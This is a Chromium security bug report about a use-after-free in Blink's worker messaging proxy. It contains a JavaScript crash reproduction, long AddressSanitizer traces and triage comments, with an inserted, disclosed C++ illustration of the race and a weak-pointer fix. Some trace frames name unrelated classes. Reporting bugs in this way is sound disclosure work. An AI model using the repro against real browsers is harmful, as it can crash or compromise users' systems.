
Issue 652047 link

Starred by 1 user

Issue metadata

Status: Duplicate
Owner:
Closed: Nov 2016
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security




Security: Web Workers - Use After Free with DedicatedWorkerMessagingProxy

Reported by loobeny...@gmail.com, Oct 1 2016

Issue description

VULNERABILITY DETAILS
	Steps to reproduce:
	
	1. Run the server-side script UAF_DedicatedWorkerMessagingProxy_Repro.js in Node.js (node UAF_DedicatedWorkerMessagingProxy_Repro.js).
	2. Open http://localhost:12345 in a Chrome ASAN build.
	3. ASAN reports a use-after-free in DedicatedWorkerMessagingProxy.

	SUMMARY: AddressSanitizer: heap-use-after-free C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\InProcessWorkerMessagingProxy.cpp:157 in blink::InProcessWorkerMessagingProxy::dispatchErrorEvent



VERSION
	Chrome Version: Chromium 55.0.2876.0 (Developer Build) (32-bit)
	( https://www.googleapis.com/download/storage/v1/b/chromium-browser-asan/o/win32-release%2Fasan-win32-release-421807.zip?generation=1475225824169000&alt=media )
	Operating System: Windows 10

REPRODUCTION CASE (full code in UAF_DedicatedWorkerMessagingProxy_Repro.js)
	// Main page served by the Node.js script: it reloads itself after 100-500 ms,
	// creates a worker, then at 430 ms posts a transferred ArrayBuffer and
	// immediately terminates the worker.
	var MainPageCode = '<html><script>setTimeout(function(){location.reload()},100+Math.floor(400*Math.random()));\n';
	MainPageCode += 'var uInt8Array = new Uint8Array(124);\n';
	MainPageCode += 'for (var i = 0; i < uInt8Array.length; ++i) {\n  uInt8Array[i] = i;\n }\n';
	MainPageCode += 'var worker1 = new Worker("worker1.js");\n';
	MainPageCode += 'setTimeout(function(){worker1.postMessage(uInt8Array.buffer, [uInt8Array.buffer]);\n try{worker1.terminate();} catch(e){}\n';
	MainPageCode += '}, 430);\n';
	MainPageCode += '</script></html>\n';
	// worker1.js: the incoming message carries no MessagePort, so e.ports[0] is
	// undefined and the postMessage call throws; the uncaught error is reported
	// back to the main thread as an error event (dispatchErrorEvent in the trace).
	var workercode1 = 'onmessage = function (e) {transferedChan = e.ports[0]; transferedChan.postMessage("HelloWorker", [msgChan0.port2]); };\n';
	workercode1 += 'var msgChan0 = new MessageChannel();\n';
	workercode1 += 'console.error("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");\n';
	workercode1 += 'try{ dump("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");} catch(e){}\n';


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Crash State: 

	=================================================================
	==13140==ERROR: AddressSanitizer: heap-use-after-free on address 0x2b24b8ac at pc 0x1bb4d641 bp 0x007dd47c sp 0x007dd470
	READ of size 4 at 0x2b24b8ac thread T0
	==13140==WARNING: Failed to use and restart external symbolizer!
	==13140==*** WARNING: Failed to initialize DbgHelp!              ***
	==13140==*** Most likely this means that the app is already      ***
	==13140==*** using DbgHelp, possibly with incompatible flags.    ***
	==13140==*** Due to technical reasons, symbolization might crash ***
	==13140==*** or produce wrong results.                           ***
		#0 0x1bb4d640 in blink::InProcessWorkerMessagingProxy::dispatchErrorEvent C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\InProcessWorkerMessagingProxy.cpp:157
		#1 0x1bb5e34d in base::internal::FunctorTraits<void (blink::InProcessWorkerMessagingProxy::*)(const WTF::String &, std::unique_ptr<blink::SourceLocation,std::default_delete<blink::SourceLocation> >, int) __attribute__((thiscall)),void>::Invoke<blink::InProcessWorkerMessagingProxy *,const WTF::String &,std::unique_ptr<blink::SourceLocation,std::default_delete<blink::SourceLocation> >,const int &> C:\b\c\b\win_asan_release\src\base\bind_internal.h:214
		#2 0x1bb5e15f in base::internal::Invoker<base::internal::BindState<void (blink::InProcessWorkerMessagingProxy::*)(const WTF::String &, std::unique_ptr<blink::SourceLocation,std::default_delete<blink::SourceLocation> >, int) __attribute__((thiscall)),WTF::UnretainedWrapper<blink::InProcessWorkerMessagingProxy,WTF::FunctionThreadAffinity::CrossThreadAffinity>,WTF::String,WTF::PassedWrapper<std::unique_ptr<blink::SourceLocation,std::default_delete<blink::SourceLocation> > >,int>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332
		#3 0x15ab5296 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54
		#4 0x1967c688 in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:344
		#5 0x196785fb in blink::scheduler::TaskQueueManager::DoWork C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:240
		#6 0x196816b0 in base::internal::Invoker<base::internal::BindState<void (blink::scheduler::TaskQueueManager::*)(base::TimeTicks, bool) __attribute__((thiscall)),base::WeakPtr<blink::scheduler::TaskQueueManager>,base::TimeTicks,bool>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332
		#7 0x15ab5296 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54
		#8 0x15911f87 in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:405
		#9 0x15913d2a in base::MessageLoop::DoDelayedWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:552
		#10 0x15abe382 in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:39
		#11 0x15911441 in base::MessageLoop::RunHandler C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:370
		#12 0x1599aeae in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:35
		#13 0x1cf444bf in content::RendererMain C:\b\c\b\win_asan_release\src\content\renderer\renderer_main.cc:198
		#14 0x15787853 in content::RunNamedProcessTypeMain C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:418
		#15 0x157890d5 in content::ContentMainRunnerImpl::Run C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:786
		#16 0x157873a4 in content::ContentMain C:\b\c\b\win_asan_release\src\content\app\content_main.cc:20
		#17 0xff311b8 in ChromeMain C:\b\c\b\win_asan_release\src\chrome\app\chrome_main.cc:97
		#18 0x11da895 in MainDllLoader::Launch C:\b\c\b\win_asan_release\src\chrome\app\main_dll_loader_win.cc:174
		#19 0x11d1b0c in main C:\b\c\b\win_asan_release\src\chrome\app\chrome_exe_main_win.cc:245
		#20 0x22ab3f7 in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:253
		#21 0x75aa62c3 in BaseThreadInitThunk+0x23 (C:\WINDOWS\System32\KERNEL32.DLL+0x162c3)
		#22 0x77dd0608 in RtlSubscribeWnfStateChangeNotification+0x438 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x60608)
		#23 0x77dd05d3 in RtlSubscribeWnfStateChangeNotification+0x403 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x605d3)

	0x2b24b8ac is located 44 bytes inside of 80-byte region [0x2b24b880,0x2b24b8d0)
	freed by thread T0 here:
		#0 0x228f738 in free e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:44
		#1 0x1c366786 in blink::CompositorWorkerMessagingProxy::~CompositorWorkerMessagingProxy C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\modules\compositorworker\CompositorWorkerMessagingProxy.cpp:19
		#2 0x1bb5144b in blink::ThreadedMessagingProxyBase::workerThreadTerminated C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\ThreadedMessagingProxyBase.cpp:122
		#3 0x15ab5296 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54
		#4 0x1967c688 in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:344
		#5 0x196785fb in blink::scheduler::TaskQueueManager::DoWork C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:240
		#6 0x196816b0 in base::internal::Invoker<base::internal::BindState<void (blink::scheduler::TaskQueueManager::*)(base::TimeTicks, bool) __attribute__((thiscall)),base::WeakPtr<blink::scheduler::TaskQueueManager>,base::TimeTicks,bool>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332
		#7 0x15ab5296 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54
		#8 0x15911f87 in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:405
		#9 0x159138ec in base::MessageLoop::DoWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:511
		#10 0x15abe5d4 in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:35
		#11 0x15911441 in base::MessageLoop::RunHandler C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:370
		#12 0x1599aeae in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:35
		#13 0x1cf444bf in content::RendererMain C:\b\c\b\win_asan_release\src\content\renderer\renderer_main.cc:198
		#14 0x15787853 in content::RunNamedProcessTypeMain C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:418
		#15 0x157890d5 in content::ContentMainRunnerImpl::Run C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:786
		#16 0x157873a4 in content::ContentMain C:\b\c\b\win_asan_release\src\content\app\content_main.cc:20
		#17 0xff311b8 in ChromeMain C:\b\c\b\win_asan_release\src\chrome\app\chrome_main.cc:97
		#18 0x11da895 in MainDllLoader::Launch C:\b\c\b\win_asan_release\src\chrome\app\main_dll_loader_win.cc:174
		#19 0x11d1b0c in main C:\b\c\b\win_asan_release\src\chrome\app\chrome_exe_main_win.cc:245
		#20 0x22ab3f7 in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:253
		#21 0x75aa62c3 in BaseThreadInitThunk+0x23 (C:\WINDOWS\System32\KERNEL32.DLL+0x162c3)
		#22 0x77dd0608 in RtlSubscribeWnfStateChangeNotification+0x438 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x60608)
		#23 0x77dd05d3 in RtlSubscribeWnfStateChangeNotification+0x403 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x605d3)

	previously allocated by thread T0 here:
		#0 0x228f81c in malloc e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:65
		#1 0x14ec5cea in WTF::Partitions::fastMalloc C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\wtf\allocator\Partitions.h:109
		#2 0x1989627c in blink::DedicatedWorkerMessagingProxyProviderImpl::createWorkerMessagingProxy C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\web\DedicatedWorkerMessagingProxyProviderImpl.cpp:58
		#3 0x1bb2a563 in blink::Worker::createInProcessWorkerMessagingProxy C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\Worker.cpp:51
		#4 0x1bb2e86e in blink::InProcessWorkerBase::initialize C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\InProcessWorkerBase.cpp:64
		#5 0x1bb2a2a2 in blink::Worker::create C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\Worker.cpp:31
		#6 0x19ed814a in blink::V8Worker::constructorCallback C:\b\c\b\Win_ASan_Release\src\out\Release\gen\blink\bindings\core\v8\V8Worker.cpp:203
		#7 0x11ca78ec in v8::internal::FunctionCallbackArguments::Call C:\b\c\b\win_asan_release\src\v8\src\api-arguments.cc:19
		#8 0x11f37c36 in v8::internal::`anonymous namespace'::HandleApiCallHelper<1> C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:106
		#9 0x11f359eb in v8::internal::Builtin_Impl_HandleApiCall C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:131
		#10 0x11f34c16 in v8::internal::Builtin_HandleApiCall C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:123

	SUMMARY: AddressSanitizer: heap-use-after-free C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\InProcessWorkerMessagingProxy.cpp:157 in blink::InProcessWorkerMessagingProxy::dispatchErrorEvent
	==13140==ABORTING
	=================================================================

 
UAF_DedicatedWorkerMessagingProxy_Repro.js
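Added illustration, not code from the report or from Chromium: a single-threaded C++ model of the lifetime bug the stack traces show, an error-event task bound to the messaging proxy through a raw Unretained-style pointer racing the worker-terminated task that deletes the proxy, beside a weak-pointer binding (modelled on how base::WeakPtr invalidates itself) that drops the task safely instead. The task queue, WeakFlag, liveness registry and the TypeError text are constructed stand-ins, and the page does not say whether Chromium's fix took this form.

```cpp
#include <cstdio>
#include <deque>
#include <functional>
#include <memory>
#include <set>
#include <string>

// Stand-in for the renderer main-thread task queue (the
// TaskQueueManager::DoWork frames in the report): tasks run in posting order.
struct MainThreadQueue {
    std::deque<std::function<void()>> tasks;
    void post(std::function<void()> task) { tasks.push_back(std::move(task)); }
    void drain() {
        while (!tasks.empty()) {
            std::function<void()> task = std::move(tasks.front());
            tasks.pop_front();
            task();
        }
    }
};

// Minimal model of base::WeakPtr: a ref-counted flag that the owning object
// clears in its destructor, so a task holding it can tell the object is gone.
struct WeakFlag { bool alive = true; };

// Debug-only liveness registry standing in for ASan's freed-region tracking.
// It lets the raw-pointer variant *report* a dangling access instead of
// dereferencing freed memory, which would be undefined behaviour.
static std::set<const void*> g_liveProxies;

enum class Outcome { NotRun, Dispatched, DroppedDeadProxy, DanglingAccess };

// Model of InProcessWorkerMessagingProxy: created on the main thread when the
// page constructs a Worker, destroyed when the worker thread terminates.
struct MessagingProxy {
    std::string lastError;
    std::shared_ptr<WeakFlag> weakFlag = std::make_shared<WeakFlag>();

    MessagingProxy() { g_liveProxies.insert(this); }
    ~MessagingProxy() {
        weakFlag->alive = false;  // invalidates every outstanding weak reference
        g_liveProxies.erase(this);
    }
    // Main-thread half of dispatchErrorEvent (frame #0 of the crashing stack).
    void dispatchErrorEvent(const std::string& message) { lastError = message; }
};

// Vulnerable form: the worker thread forwards the script error as a task
// bound with a raw pointer (the WTF::UnretainedWrapper in the stack trace).
void postErrorUnretained(MainThreadQueue& q, MessagingProxy* proxy,
                         std::string message, Outcome& result) {
    q.post([proxy, message, &result] {
        if (g_liveProxies.count(proxy) == 0) { result = Outcome::DanglingAccess; return; }
        proxy->dispatchErrorEvent(message);
        result = Outcome::Dispatched;
    });
}

// Hardened form: bind through the weak flag; if the proxy died in the
// meantime the task is dropped instead of touching freed memory.
void postErrorWeak(MainThreadQueue& q, MessagingProxy* proxy,
                   std::string message, Outcome& result) {
    std::shared_ptr<WeakFlag> flag = proxy->weakFlag;
    q.post([flag, proxy, message, &result] {
        if (!flag->alive) { result = Outcome::DroppedDeadProxy; return; }
        proxy->dispatchErrorEvent(message);
        result = Outcome::Dispatched;
    });
}

// Worker-thread termination notification: on the main thread the proxy is
// deleted (ThreadedMessagingProxyBase::workerThreadTerminated -> destructor).
void postWorkerTerminated(MainThreadQueue& q, std::unique_ptr<MessagingProxy>& owner) {
    q.post([&owner] { owner.reset(); });
}

// Replays the repro's timing: postMessage() makes the worker's onmessage throw
// (it indexes e.ports[0], which the ArrayBuffer message does not carry) and
// terminate() follows immediately. terminatedFirst selects which of the two
// worker-thread notifications reaches the main-thread queue first.
Outcome runScenario(bool useWeakPtr, bool terminatedFirst) {
    MainThreadQueue mainThread;
    std::unique_ptr<MessagingProxy> owner(new MessagingProxy());
    Outcome result = Outcome::NotRun;
    // Constructed error text; the real message comes from V8.
    const std::string error = "TypeError: Cannot read property 'postMessage' of undefined";
    auto postError = [&] {
        if (useWeakPtr) postErrorWeak(mainThread, owner.get(), error, result);
        else postErrorUnretained(mainThread, owner.get(), error, result);
    };
    if (terminatedFirst) { postWorkerTerminated(mainThread, owner); postError(); }
    else { postError(); postWorkerTerminated(mainThread, owner); }
    mainThread.drain();
    return result;
}

int main() {
    // 1 = Dispatched, 2 = DroppedDeadProxy, 3 = DanglingAccess
    std::printf("unretained, error first:     %d\n", static_cast<int>(runScenario(false, false)));
    std::printf("unretained, terminate first: %d\n", static_cast<int>(runScenario(false, true)));
    std::printf("weak,       error first:     %d\n", static_cast<int>(runScenario(true, false)));
    std::printf("weak,       terminate first: %d\n", static_cast<int>(runScenario(true, true)));
    return 0;
}
```

Only the "terminate first" ordering is dangerous, which is why the repro leans on timing (the 430 ms timer and random reloads) and why a weak binding, or cancelling the proxy's pending tasks on termination, removes the bug class rather than one interleaving.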
Project Member

Comment 1 by ClusterFuzz, Oct 3 2016

ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=4924947845873664
Project Member

Comment 2 by ClusterFuzz, Oct 3 2016

ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5447105407877120
Project Member

Comment 3 by ClusterFuzz, Oct 3 2016

ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=4550953435136000

Comment 4 by kenrb@chromium.org, Oct 3 2016

Cc: kenrb@chromium.org
Labels: Needs-Feedback
This isn't reproducing on our test infrastructure, although I had to turn your test case into an HTML and a JS file since we don't have node.js available there. Is this 100% reliable for you? Are there any other specific repro instructions?

Yes, it's very reliable. However, sometimes you may need to wait for longer or just try a few times.

To make it easy for you to run it with your infrastructure, I also converted the repro to a single HTML file UAF_DedicatedWorkerMessagingProxy_Repro.html.

It's also reproducible with the Linux ASAN build. Opening UAF_DedicatedWorkerMessagingProxy_Repro.html in the Linux ASAN build, I got:

Chromium 55.0.2880.0 (Developer Build) (64-bit)
=================================================================
==1==ERROR: AddressSanitizer: unknown-crash on address 0x7e9f44501a18 at pc 0x7f4a9efd1eb3 bp 0x7ffd1bec98d0 sp 0x7ffd1bec98c8
READ of size 8 at 0x7e9f44501a18 thread T0 (chrome)
==1==WARNING: invalid path to external symbolizer!
==1==WARNING: Failed to use and restart external symbolizer!

Address 0x7e9f44501a18 is a wild pointer.
SUMMARY: AddressSanitizer: unknown-crash (/home/coder/ChromeBuilds/asan-linux-release-422398/chrome+0x8f74eb2) 
==1==ABORTING

(looks like Chrome Linux build now has some issue with the symbolizer)
UAF_DedicatedWorkerMessagingProxy_Repro.html
Reproduced in the Windows ASAN build by opening the HTML file UAF_DedicatedWorkerMessagingProxy_Repro.html:

Chromium 55.0.2880.0 (Developer Build) (32-bit)
( https://www.googleapis.com/download/storage/v1/b/chromium-browser-asan/o/win32-release%2Fasan-win32-release-422398.zip?generation=1475506962107000&alt=media )
=================================================================
==11028==ERROR: AddressSanitizer: heap-use-after-free on address 0x035c4f2c at pc 0x1ad673d1 bp 0x010fd45c sp 0x010fd450
READ of size 4 at 0x035c4f2c thread T0
==11028==WARNING: Failed to use and restart external symbolizer!
==11028==*** WARNING: Failed to initialize DbgHelp!              ***
==11028==*** Most likely this means that the app is already      ***
==11028==*** using DbgHelp, possibly with incompatible flags.    ***
==11028==*** Due to technical reasons, symbolization might crash ***
==11028==*** or produce wrong results.                           ***
    #0 0x1ad673d0 in blink::InProcessWorkerMessagingProxy::dispatchErrorEvent C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\InProcessWorkerMessagingProxy.cpp:190
    #1 0x160b9397 in base::internal::FunctorTraits<void (disk_cache::SimpleSynchronousEntry::*)(const disk_cache::SimpleEntryStat &, std::unique_ptr<std::vector<disk_cache::SimpleSynchronousEntry::CRCRecord,std::allocator<disk_cache::SimpleSynchronousEntry::CRCRecord> >,std::default_delete<std::vector<disk_cache::SimpleSynchronousEntry::CRCRecord,std::allocator<disk_cache::SimpleSynchronousEntry::CRCRecord> > > >, net::GrowableIOBuffer *) __attribute__((thiscall)),void>::Invoke<disk_cache::SimpleSynchronousEntry *,const disk_cache::SimpleEntryStat &,std::unique_ptr<std::vector<disk_cache::SimpleSynchronousEntry::CRCRecord,std::allocator<disk_cache::SimpleSynchronousEntry::CRCRecord> >,std::default_delete<std::vector<disk_cache::SimpleSynchronousEntry::CRCRecord,std::allocator<disk_cache::SimpleSynchronousEntry::CRCRecord> > > >,net::GrowableIOBuffer *> C:\b\c\b\win_asan_release\src\base\bind_internal.h:214
    #2 0x1ad77fdf in base::internal::Invoker<base::internal::BindState<void (blink::InProcessWorkerMessagingProxy::*)(const WTF::String &, std::unique_ptr<blink::SourceLocation,std::default_delete<blink::SourceLocation> >, int) __attribute__((thiscall)),WTF::UnretainedWrapper<blink::InProcessWorkerMessagingProxy,WTF::FunctionThreadAffinity::CrossThreadAffinity>,WTF::String,WTF::PassedWrapper<std::unique_ptr<blink::SourceLocation,std::default_delete<blink::SourceLocation> > >,int>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332
    #3 0x14cdb506 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54
    #4 0x188a28be in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:344
    #5 0x1889e7fb in blink::scheduler::TaskQueueManager::DoWork C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:240
    #6 0x188a631a in base::internal::Invoker<base::internal::BindState<void (blink::scheduler::TaskQueueManager::*)(base::TimeTicks, bool) __attribute__((thiscall)),base::WeakPtr<blink::scheduler::TaskQueueManager>,base::TimeTicks,bool>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332
    #7 0x14cdb506 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54
    #8 0x14b36e57 in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:405
    #9 0x14b392aa in base::MessageLoop::DoDelayedWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:552
    #10 0x14ce4602 in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:39
    #11 0x14b36311 in base::MessageLoop::RunHandler C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:370
    #12 0x14bbfe7e in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:35
    #13 0x1c1624df in content::RendererMain C:\b\c\b\win_asan_release\src\content\renderer\renderer_main.cc:198
    #14 0x149ac103 in content::RunNamedProcessTypeMain C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:418
    #15 0x149ad985 in content::ContentMainRunnerImpl::Run C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:786
    #16 0x149abc54 in content::ContentMain C:\b\c\b\win_asan_release\src\content\app\content_main.cc:20
    #17 0xf1611b8 in ChromeMain C:\b\c\b\win_asan_release\src\chrome\app\chrome_main.cc:97
    #18 0x7a6a5 in MainDllLoader::Launch C:\b\c\b\win_asan_release\src\chrome\app\main_dll_loader_win.cc:174
    #19 0x71b0c in main C:\b\c\b\win_asan_release\src\chrome\app\chrome_exe_main_win.cc:245
    #20 0x4cebbd in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:253
    #21 0x741138f3 in BaseThreadInitThunk+0x23 (C:\WINDOWS\SYSTEM32\KERNEL32.DLL+0x138f3)
    #22 0x77125de2 in RtlUnicodeStringToInteger+0x252 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x65de2)
    #23 0x77125dad in RtlUnicodeStringToInteger+0x21d (C:\WINDOWS\SYSTEM32\ntdll.dll+0x65dad)

0x035c4f2c is located 44 bytes inside of 80-byte region [0x035c4f00,0x035c4f50)
freed by thread T0 here:
    #0 0x4b2ef8 in free e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:44
    #1 0x1ad368d6 in blink::DedicatedWorkerMessagingProxy::~DedicatedWorkerMessagingProxy C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\DedicatedWorkerMessagingProxy.cpp:18
    #2 0x1ad6b18b in blink::ThreadedMessagingProxyBase::workerThreadTerminated C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\ThreadedMessagingProxyBase.cpp:129
    #3 0x14cdb506 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54
    #4 0x188a28be in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:344
    #5 0x1889e7fb in blink::scheduler::TaskQueueManager::DoWork C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:240
    #6 0x188a631a in base::internal::Invoker<base::internal::BindState<void (blink::scheduler::TaskQueueManager::*)(base::TimeTicks, bool) __attribute__((thiscall)),base::WeakPtr<blink::scheduler::TaskQueueManager>,base::TimeTicks,bool>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332
    #7 0x14cdb506 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54
    #8 0x14b36e57 in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:405
    #9 0x14b38e6c in base::MessageLoop::DoWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:511
    #10 0x14ce4854 in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:35
    #11 0x14b36311 in base::MessageLoop::RunHandler C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:370
    #12 0x14bbfe7e in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:35
    #13 0x1c1624df in content::RendererMain C:\b\c\b\win_asan_release\src\content\renderer\renderer_main.cc:198
    #14 0x149ac103 in content::RunNamedProcessTypeMain C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:418
    #15 0x149ad985 in content::ContentMainRunnerImpl::Run C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:786
    #16 0x149abc54 in content::ContentMain C:\b\c\b\win_asan_release\src\content\app\content_main.cc:20
    #17 0xf1611b8 in ChromeMain C:\b\c\b\win_asan_release\src\chrome\app\chrome_main.cc:97
    #18 0x7a6a5 in MainDllLoader::Launch C:\b\c\b\win_asan_release\src\chrome\app\main_dll_loader_win.cc:174
    #19 0x71b0c in main C:\b\c\b\win_asan_release\src\chrome\app\chrome_exe_main_win.cc:245
    #20 0x4cebbd in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:253
    #21 0x741138f3 in BaseThreadInitThunk+0x23 (C:\WINDOWS\SYSTEM32\KERNEL32.DLL+0x138f3)
    #22 0x77125de2 in RtlUnicodeStringToInteger+0x252 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x65de2)
    #23 0x77125dad in RtlUnicodeStringToInteger+0x21d (C:\WINDOWS\SYSTEM32\ntdll.dll+0x65dad)

previously allocated by thread T0 here:
    #0 0x4b2fdc in malloc e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:65
    #1 0x140eb60a in WTF::Partitions::fastMalloc C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\wtf\allocator\Partitions.h:99
    #2 0x18aba3bc in blink::DedicatedWorkerMessagingProxyProviderImpl::createWorkerMessagingProxy C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\web\DedicatedWorkerMessagingProxyProviderImpl.cpp:62
    #3 0x1ad44303 in blink::Worker::createInProcessWorkerMessagingProxy C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\Worker.cpp:49
    #4 0x1ad485be in blink::InProcessWorkerBase::initialize C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\InProcessWorkerBase.cpp:66
    #5 0x1ad44042 in blink::Worker::create C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\Worker.cpp:30
    #6 0x190fda40 in blink::V8Worker::constructorCallback C:\b\c\b\win_asan_release\src\out\release\gen\blink\bindings\core\v8\V8Worker.cpp:203
    #7 0x10ef1f9c in v8::internal::FunctionCallbackArguments::Call C:\b\c\b\win_asan_release\src\v8\src\api-arguments.cc:19
    #8 0x111849e6 in v8::internal::`anonymous namespace'::HandleApiCallHelper<1> C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:106
    #9 0x1118279b in v8::internal::Builtin_Impl_HandleApiCall C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:131
    #10 0x111819c6 in v8::internal::Builtin_HandleApiCall C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:123

SUMMARY: AddressSanitizer: heap-use-after-free C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\InProcessWorkerMessagingProxy.cpp:190 in blink::InProcessWorkerMessagingProxy::dispatchErrorEvent
==11028==ABORTING

Project Member

Comment 7 by ClusterFuzz, Oct 4 2016

